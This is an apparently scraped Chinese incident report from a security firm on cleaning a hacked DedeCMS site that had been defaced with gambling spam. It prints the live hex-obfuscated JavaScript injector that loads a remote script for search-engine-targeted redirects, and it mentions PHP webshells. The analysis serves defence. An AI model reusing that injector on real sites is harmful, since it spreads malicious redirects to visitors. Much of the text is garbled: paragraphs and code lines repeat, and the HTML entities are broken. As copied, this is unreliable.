2018.6.19当天接到一位新客户反映自己的网站被黑了,网站首页也被黑客篡改了,网站首
页被加了一些与网站不相符的内容与加密的代码,导致百度网址安全中心提醒您:该页面可能存
在木马病毒!网站在百度的收录与快照也被劫持成什么世界杯投注,以及博彩,赌博等等的内容,
根据以上客户给我们反映的网站被黑的问题,我们Sine安全公司立即安排安全技术人员对客户网
站被黑的情况进行了详细的网站安全检测与代码的人工安全审计,发现客户网站首页之前是经常的
被篡改,客户只能删除掉首页文件,然后重新生成首页,实在是反复被篡改的没办法了,才找到我
们SINE安全公司来处理网站的安全问题.
一.网站被黑的状况分析
1.客户的网站采用的是,织梦DEDECMS系统(PHP+MYSQL数据库架构),dedecms漏洞在近几
年实在是爆出了太多,但是现在用dedecms做网站以及平台的也很多,一般企业站或做优化排名的网
站都是用这个织梦的程序来做,优化快,访问速度也快,全站可以静态文件生成,方便管理更新文章,
也方便网站打开的速度,以及关键词方面的优化与提升。通过与客户的沟通了解,发现客户的网站
,只要是发布新的文章,并在后台生成新的html页面,或者生成首页index.html,就会被攻击者直
接增加了一些加密的代码与赌博的内容,图片如下:
网站被篡改的内容都是加了一些什么,极速赛车,赌博,博彩、赌球,世界杯投注的与网站不相关
的内容,而且这个网站代码还做了JS判断跳转,针对于Baidu搜索来的客户,会直接跳转到这个极速
赛车、赌博、博彩的页面,导致360提示博彩网站拦截,百度提示风险拦截的图片如下:
网站在百度的搜索中会直接风险提示:百度网址安全中心提醒你:该页面可能存在木马病毒。
通过对客户网站的所有代码的安全检测与代码的人工安全审计,发现网站首页index.html中的内容
被篡改,并发现在dedecms模板目录文件下的index.htm文件也被篡改了。
年实在是爆出了太多,但是现在用dedecms做网站以及平台的也很多,一般企业站或做优化排名的网
站都是用这个织梦的程序来做,优化快,访问速度也快,全站可以静态文件生成,方便管理更新文章,
也方便网站打开的速度,以及关键词方面的优化与提升。通过与客户的沟通了解,发现客户的网站
,只要是发布新的文章,并在后台生成新的html页面,或者生成首页index.html,就会被攻击者直
接增加了一些加密的代码与赌博的内容,图片如下:
网站被篡改的内容都是加了一些什么,极速赛车,赌博,博彩、赌球,世界杯投注的与网站不相关
的内容,而且这个网站代码还做了JS判断跳转,针对于Baidu搜索来的客户,会直接跳转到这个极速
赛车、赌博、博彩的页面,导致360提示博彩网站拦截,百度提示风险拦截的图片如下:
网站在百度的搜索中会直接风险提示:百度网址安全中心提醒你:该页面可能存在木马病毒。
通过对客户网站的所有代码的安全检测与代码的人工安全审计,发现网站首页index.html中的内容
被篡改,并发现在dedecms模板目录文件下的index.htm文件也被篡改了。
我们来打开index.htm模板文件,看下代码:
<meta content="text/html; charset=gb2312" http-equiv="Content-Type"/>
<title>
极速赛车计划软件a
pp下载_极速赛车ó
20;奖直播_极速赛车૤
0;册登录-极速赛车官
网平台。
pp下载_极速赛车ó
20;奖直播_极速赛车૤
0;册登录-极速赛车官
网平台。
</title>
<meta content="极速赛车,极速&#
36187;车走势分析,极速
6187;车开奖结果,极速$
187;车人工计划。" name="keywords"/>
36187;车走势分析,极速
6187;车开奖结果,极速$
187;车人工计划。" name="keywords"/>
下面的这一段代码是加密的JS跳转代码,是根据百度搜索等相应的条件,进行判断,然后跳转,直
接输入网站域名不会跳转。
接输入网站域名不会跳转。
<script type="text/javascript">
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]
('\x3c\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6
a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3d\x22\x68\x74\x74\
x70\x3a\x2f\x2f\x77\x77\x77\x2e\x38\x30\x30\x30\x6b\x61\x69\x2e\x63\x6f\x6d\x2f\x
73\x74\x61\x74\x69\x63\x2f\x6a\x73\x2f\x38\x30\x30\x30\x6b\x61\x69\x2e\x6a\x73\x
22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e');
('\x3c\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6
a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3d\x22\x68\x74\x74\
x70\x3a\x2f\x2f\x77\x77\x77\x2e\x38\x30\x30\x30\x6b\x61\x69\x2e\x63\x6f\x6d\x2f\x
73\x74\x61\x74\x69\x63\x2f\x6a\x73\x2f\x38\x30\x30\x30\x6b\x61\x69\x2e\x6a\x73\x
22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e');
</script>
上面查到一些加密的代码,用编码的解密查到,是一些博彩与赌球相关的内容,我们把生成首页后
被篡改的内容直接删除掉,然后对其网站里留存下来的木马病毒,以及木马后门进行清除,并做好
网站的漏洞检测与漏洞修复,部署网站防篡改方案。
上面查到一些加密的代码,用编码的解密查到,是一些博彩与赌球相关的内容,我们把生成首页后
被篡改的内容直接删除掉,然后对其网站里留存下来的木马病毒,以及木马后门进行清除,并做好
网站的漏洞检测与漏洞修复,部署网站防篡改方案。
二.网站被黑的清理过程记录
1.网站经过SINE安全技术的安全审计后,在安全的处理过程中发现网站根目录下的datas.php文件内
容属于assert类型的一句话木马。
那么既然发现有一句话木马,那肯定是存在PHP脚本木马的,随即发现在css目录下有个文件是
base64加密的代码,我们访问该木马地址,进行了访问发现的确是木马病毒的,所在图片如下:
该PHP脚本木马的操作权限实在是太大了,对文件的编辑以及改名,以及执行恶意的sql语句,查
看服务器的系统信息都可以看的很清楚.对网站的所有程序代码,进行了木马特征扫描,发现了
N个网站木马文件,怪不得客户自己说反反复复的出现被黑,网站被篡改的都快要吐血了。扫描到
的木马病毒如下图所示:
容属于assert类型的一句话木马。
那么既然发现有一句话木马,那肯定是存在PHP脚本木马的,随即发现在css目录下有个文件是
base64加密的代码,我们访问该木马地址,进行了访问发现的确是木马病毒的,所在图片如下:
该PHP脚本木马的操作权限实在是太大了,对文件的编辑以及改名,以及执行恶意的sql语句,查
看服务器的系统信息都可以看的很清楚.对网站的所有程序代码,进行了木马特征扫描,发现了
N个网站木马文件,怪不得客户自己说反反复复的出现被黑,网站被篡改的都快要吐血了。扫描到
的木马病毒如下图所示:
这么多个脚本木马后门,我们安全技术直接进行了全部删除清理,由于客户网站用的是单独的服务
器。那么对服务器的安全也要进行详细的安全加固和网站安全防护,查看到网站的mysql数据库,
分配给网站使用的是root权限,(用root管理员权限会导致整个服务器都会被黑,增加了攻击风险
)我们给客户服务器增加了一个普通权限的数据库账户分配给网站,数据库的端口3306以及135
端口445端口139端口都进行了端口安全策略部署,杜绝外网一切连接,只允许内网连接,对服务
器进行了详细的服务器安全设置和部署,后续我们对网站的所有文件,代码,图片,数据库里的
内容,进行了详细的安全检测与对比,从SQL注入测试、XSS跨站安全测试、表单绕过、文件上
传漏洞测试、文件包含漏洞检测、网页挂马、网页后门木马检测、包括一句话小马、aspx大马、
脚本木马后门、敏感信息泄露测试、任意文件读取、目录遍历、弱口令安全检测等方面进行了全
面的安全检测,与漏洞修复,至此客户网站被黑的问题才得以完美的解决。因为之前客户都是平
均一天被篡改两三次,从做安全部署到今天20号,客户网站访问一切正常,没有被篡改。
器。那么对服务器的安全也要进行详细的安全加固和网站安全防护,查看到网站的mysql数据库,
分配给网站使用的是root权限,(用root管理员权限会导致整个服务器都会被黑,增加了攻击风险
)我们给客户服务器增加了一个普通权限的数据库账户分配给网站,数据库的端口3306以及135
端口445端口139端口都进行了端口安全策略部署,杜绝外网一切连接,只允许内网连接,对服务
器进行了详细的服务器安全设置和部署,后续我们对网站的所有文件,代码,图片,数据库里的
内容,进行了详细的安全检测与对比,从SQL注入测试、XSS跨站安全测试、表单绕过、文件上
传漏洞测试、文件包含漏洞检测、网页挂马、网页后门木马检测、包括一句话小马、aspx大马、
脚本木马后门、敏感信息泄露测试、任意文件读取、目录遍历、弱口令安全检测等方面进行了全
面的安全检测,与漏洞修复,至此客户网站被黑的问题才得以完美的解决。因为之前客户都是平
均一天被篡改两三次,从做安全部署到今天20号,客户网站访问一切正常,没有被篡改。
三.针对于网站被黑的防护建议
1.定期的更新服务器系统漏洞(windows 2008 2012、linux centos系统),网站系统升级,尽量
不适用第三方的API插件代码。
不适用第三方的API插件代码。
2.如果自己对程序代码不是太了解的话,建议找网站安全公司去修复网站的漏洞,以及代码的安
全检测与木马后门清除,国内推荐SINE安全公司、绿盟安全公司、启明星辰等的网站安全公司,
做深入的网站安全服务,来保障网站的安全稳定运行,防止网站被挂马之类的安全问题。
全检测与木马后门清除,国内推荐SINE安全公司、绿盟安全公司、启明星辰等的网站安全公司,
做深入的网站安全服务,来保障网站的安全稳定运行,防止网站被挂马之类的安全问题。
3.尽量不要把网站的后台用户的密码设置的太简单化,要符合10到18位的大小写字母+数字+符号
组合。
组合。
4.网站后台管理的路径一定不能用默认的admin或guanli或manage 或文件名为admin.asp的路径
去访问。
去访问。
5.服务器的基础安全设置必须要详细的做好,端口的安全策略,注册表安全,底层系统的安全加固
,否则服务器不安全,网站再安全也没用。
,否则服务器不安全,网站再安全也没用。
